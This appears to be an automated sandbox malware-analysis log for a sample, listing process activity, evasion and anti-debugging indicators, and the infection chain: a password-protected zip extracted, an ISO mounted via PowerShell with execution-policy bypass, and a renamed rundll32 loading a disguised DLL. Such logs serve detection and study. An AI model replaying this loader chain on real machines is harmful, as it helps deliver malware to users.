                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeStalling execution: Execution stalls by calling Sleep
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
                Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6900Thread sleep count: 334 > 30
                Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6900Thread sleep time: -167000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6740Thread sleep count: 9229 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7148Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Windows\SysWOW64\unarchiver.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\unarchiver.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9229
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 3_2_00EAB29A GetSystemInfo,
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeAPI call chain: ExitProcess graph end node
                Source: ModuleAnalysisCache.8.drBinary or memory string: Add-VMNetworkAdapter
                Source: ModuleAnalysisCache.8.drBinary or memory string: Remove-VMNetworkAdapterExtendedAcl
                Source: ModuleAnalysisCache.8.drBinary or memory string: Set-VMNetworkAdapterTeamMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: Connect-VMNetworkAdapter
                Source: ModuleAnalysisCache.8.drBinary or memory string: Add-VMNetworkAdapterExtendedAcl
                Source: ModuleAnalysisCache.8.drBinary or memory string: Get-NetEventVmNetworkAdapter
                Source: ModuleAnalysisCache.8.drBinary or memory string: Get-VMNetworkAdapterTeamMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: Get-VMNetworkAdapterIsolation
                Source: ModuleAnalysisCache.8.drBinary or memory string: Test-VMNetworkAdapter
                Source: ModuleAnalysisCache.8.drBinary or memory string: )Get-VMNetworkAdapterFailoverConfiguration
                Source: ModuleAnalysisCache.8.drBinary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
                Source: ModuleAnalysisCache.8.drBinary or memory string: Set-VMNetworkAdapterRdma
                Source: ModuleAnalysisCache.8.drBinary or memory string: (Set-VMNetworkAdapterRoutingDomainMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: Remove-VMNetworkAdapterTeamMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: Get-VMNetworkAdapterAcl
                Source: ModuleAnalysisCache.8.drBinary or memory string: )Set-VMNetworkAdapterFailoverConfiguration
                Source: ModuleAnalysisCache.8.drBinary or memory string: Rename-VMNetworkAdapter
                Source: ModuleAnalysisCache.8.drBinary or memory string: Get-VMNetworkAdapterVlan
                Source: ModuleAnalysisCache.8.drBinary or memory string: Set-VMNetworkAdapterIsolation
                Source: ModuleAnalysisCache.8.drBinary or memory string: (Add-VmNetworkAdapterRoutingDomainMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: "Remove-VMNetworkAdapterTeamMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: Remove-VMNetworkAdapterAcl
                Source: ModuleAnalysisCache.8.drBinary or memory string: Get-VMNetworkAdapter
                Source: ModuleAnalysisCache.8.drBinary or memory string: Add-VMScsiController
                Source: ModuleAnalysisCache.8.drBinary or memory string: Set-VmNetworkAdapterIsolation
                Source: ModuleAnalysisCache.8.drBinary or memory string: Set-VmNetworkAdapterRoutingDomainMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: Get-VMScsiController
                Source: ModuleAnalysisCache.8.drBinary or memory string: Get-VMNetworkAdapterRdma
                Source: ModuleAnalysisCache.8.drBinary or memory string: Set-VMNetworkAdapterRoutingDomainMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: Remove-NetEventVmNetworkAdapter
                Source: ModuleAnalysisCache.8.drBinary or memory string: Set-VMNetworkAdapterVlan
                Source: ModuleAnalysisCache.8.drBinary or memory string: Get-VmNetworkAdapterIsolation
                Source: ModuleAnalysisCache.8.drBinary or memory string: Disconnect-VMNetworkAdapter
                Source: ModuleAnalysisCache.8.drBinary or memory string: Set-VMNetworkAdapter
                Source: ModuleAnalysisCache.8.drBinary or memory string: Get-VMNetworkAdapterRoutingDomainMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: "Remove-VMNetworkAdapterExtendedAcl
                Source: ModuleAnalysisCache.8.drBinary or memory string: KC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
                Source: ModuleAnalysisCache.8.drBinary or memory string: +Remove-VMNetworkAdapterRoutingDomainMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: (Add-VMNetworkAdapterRoutingDomainMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: Add-VMNetworkAdapterRoutingDomainMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: (Get-VMNetworkAdapterRoutingDomainMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
                Source: ModuleAnalysisCache.8.drBinary or memory string: Add-VMNetworkAdapterAcl
                Source: ModuleAnalysisCache.8.drBinary or memory string: Set-VMNetworkAdapterFailoverConfiguration
                Source: ModuleAnalysisCache.8.drBinary or memory string: Add-VmNetworkAdapterRoutingDomainMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: Remove-VMScsiController
                Source: ModuleAnalysisCache.8.drBinary or memory string: OC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
                Source: ModuleAnalysisCache.8.drBinary or memory string: Add-NetEventVmNetworkAdapter
                Source: ModuleAnalysisCache.8.drBinary or memory string: Get-VMNetworkAdapterFailoverConfiguration
                Source: ModuleAnalysisCache.8.drBinary or memory string: Remove-VMNetworkAdapter
                Source: ModuleAnalysisCache.8.drBinary or memory string: (Set-VmNetworkAdapterRoutingDomainMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: Remove-VMNetworkAdapterRoutingDomainMapping
                Source: ModuleAnalysisCache.8.drBinary or memory string: Get-VMNetworkAdapterExtendedAcl

                Anti Debugging

                barindex
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB2512 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_100015BD LoadLibraryA,GetProcAddress,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB48F3 GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapFree,
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB3D9F mov esi, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_03143C9D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB5DFB LdrResolveDelayLoadedAPI,
                Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: page read and write | page guard
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB6580 SetUnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB6232 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -p758493 -y -o"C:\Users\user\AppData\Local\Temp\krjmempf.vdz" "C:\Users\user\Downloads\8fa2db5f-d558-4ee3-8a83-68f3e15e482f.zip
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\krjmempf.vdz\5353.iso
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c internee\highlighted.cmd dll32.exe tem dows
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\krjmempf.vdz\5353.iso"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\xxl.exe C:\Users\user\AppData\Local\Temp\xxl.exe internee\reservations.3ds,DllRegisterServer
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
